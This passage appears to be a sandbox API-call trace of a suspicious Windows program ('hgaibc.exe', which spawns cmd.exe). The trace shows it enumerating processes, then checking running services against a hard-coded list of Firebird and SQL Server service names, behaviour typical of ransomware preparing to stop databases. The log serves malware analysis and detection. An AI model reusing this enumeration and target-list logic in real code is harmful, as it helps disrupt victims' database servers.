th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.087] lstrlenW (lpString="svchost.exe") returned 11 [0167.087] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.088] lstrlenW (lpString="svchost.exe") returned 11 [0167.088] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0167.089] lstrlenW (lpString="spoolsv.exe") returned 11 [0167.089] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.090] lstrlenW (lpString="svchost.exe") returned 11 [0167.090] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0167.091] lstrlenW (lpString="audiodg.exe") returned 11 [0167.091] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0167.091] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0167.092] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0167.179] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0167.179] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0167.180] lstrlenW (lpString="Memory Compression") returned 18 [0167.180] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0167.181] lstrlenW (lpString="sihost.exe") returned 10 [0167.181] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.182] lstrlenW (lpString="svchost.exe") returned 11 [0167.182] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0167.183] lstrlenW (lpString="msoia.exe") returned 9 [0167.183] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.184] lstrlenW (lpString="taskhostw.exe") returned 13 [0167.184] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.185] lstrlenW (lpString="explorer.exe") returned 12 [0167.185] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0167.186] lstrlenW (lpString="SearchUI.exe") returned 12 [0167.186] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0167.187] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0167.187] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0167.188] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0167.188] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.188] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0167.188] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0167.189] lstrlenW (lpString="hgaibc.exe") returned 10 [0167.189] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0167.190] lstrlenW (lpString="cmd.exe") returned 7 [0167.190] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0167.191] lstrlenW (lpString="conhost.exe") returned 11 [0167.191] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0167.192] lstrlenW (lpString="mode.com") returned 8 [0167.192] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0167.193] lstrlenW (lpString="consent.exe") returned 11 [0167.193] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0167.194] CloseHandle (hObject=0x51c) returned 1 [0167.194] Sleep (dwMilliseconds=0x1f4) [0167.787] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c498 [0167.919] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0167.920] GetLastError () returned 0xea [0167.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x45befd8 [0167.920] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x45befd8, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x45befd8, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0167.921] CloseServiceHandle (hSCObject=0x458c498) returned 1 [0167.921] lstrlenW (lpString="Appinfo") returned 7 [0167.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0167.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0167.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0167.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0167.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0167.922] lstrlenW (lpString="AppXSvc") returned 7 [0167.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0167.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0167.922] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0167.922] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0167.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0167.922] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0167.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0167.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0167.922] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0167.922] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0167.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0167.922] lstrlenW (lpString="Audiosrv") returned 8 [0167.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0167.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0167.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0167.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0167.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0167.922] lstrlenW (lpString="BFE") returned 3 [0167.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0167.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0167.923] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0167.923] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0167.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0167.923] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0167.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0167.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0167.923] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0167.923] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0167.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0167.923] lstrlenW (lpString="CDPSvc") returned 6 [0167.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0167.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0167.923] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0167.923] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0167.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0167.923] lstrlenW (lpString="ClickToRunSvc") returned 13 [0167.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0167.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0167.923] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0167.923] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0167.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0167.923] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0167.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0167.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0167.923] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0167.923] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0167.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0167.924] lstrlenW (lpString="CryptSvc") returned 8 [0167.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0167.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0167.924] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0167.924] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0167.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0167.924] lstrlenW (lpString="DcomLaunch") returned 10 [0167.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0167.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0167.924] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0167.924] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0167.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0167.924] lstrlenW (lpString="DeviceAssociationService") returned 24 [0167.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0167.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0167.924] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0167.924] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0167.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0167.924] lstrlenW (lpString="Dhcp") returned 4 [0167.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0167.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0167.924] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0167.924] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0167.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0167.924] lstrlenW (lpString="Dnscache") returned 8 [0167.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0167.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0167.925] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0167.925] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0167.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0167.925] lstrlenW (lpString="DPS") returned 3 [0167.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0167.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0167.925] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0167.925] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0167.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0167.925] lstrlenW (lpString="DusmSvc") returned 7 [0167.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0167.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0167.925] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0167.925] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0167.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0167.925] lstrlenW (lpString="EventLog") returned 8 [0167.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0167.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0167.925] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0167.925] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0167.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0167.925] lstrlenW (lpString="EventSystem") returned 11 [0167.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0167.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0167.925] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0167.925] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0167.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0167.926] lstrlenW (lpString="FontCache") returned 9 [0167.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0167.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0167.926] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0167.926] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0167.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0167.926] lstrlenW (lpString="gpsvc") returned 5 [0167.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0167.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0167.926] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0167.926] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0167.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0167.926] lstrlenW (lpString="iphlpsvc") returned 8 [0167.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0167.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0167.926] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0167.926] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0167.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0167.926] lstrlenW (lpString="KeyIso") returned 6 [0167.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0167.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0167.926] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0167.926] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0167.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0167.926] lstrlenW (lpString="LanmanServer") returned 12 [0167.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0167.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0167.926] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0167.927] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0167.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0167.927] lstrlenW (lpString="LanmanWorkstation") returned 17 [0167.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0167.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0167.927] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0167.927] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0167.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0167.927] lstrlenW (lpString="lfsvc") returned 5 [0167.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0167.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0167.927] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0167.927] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0167.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0167.927] lstrlenW (lpString="lmhosts") returned 7 [0167.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0167.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0167.927] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0167.927] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0167.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0167.927] lstrlenW (lpString="LSM") returned 3 [0167.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0167.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0167.927] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0167.927] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0167.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0167.927] lstrlenW (lpString="MpsSvc") returned 6 [0167.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0167.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0167.928] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0167.928] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0167.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0167.928] lstrlenW (lpString="NcbService") returned 10 [0167.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0167.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0167.928] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0167.928] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0167.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0167.928] lstrlenW (lpString="netprofm") returned 8 [0167.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0167.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0167.928] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0167.928] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0167.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0167.928] lstrlenW (lpString="NgcSvc") returned 6 [0167.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0167.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0167.928] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0167.928] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0167.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0167.928] lstrlenW (lpString="NlaSvc") returned 6 [0167.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0167.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0167.928] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0167.929] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0167.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0167.929] lstrlenW (lpString="nsi") returned 3 [0167.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0167.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0167.929] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0167.929] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0167.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0167.929] lstrlenW (lpString="PcaSvc") returned 6 [0167.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0167.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0167.929] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0167.929] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0167.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0167.929] lstrlenW (lpString="PlugPlay") returned 8 [0167.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0167.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0167.929] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0167.929] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0167.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0167.929] lstrlenW (lpString="Power") returned 5 [0167.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0167.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0167.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 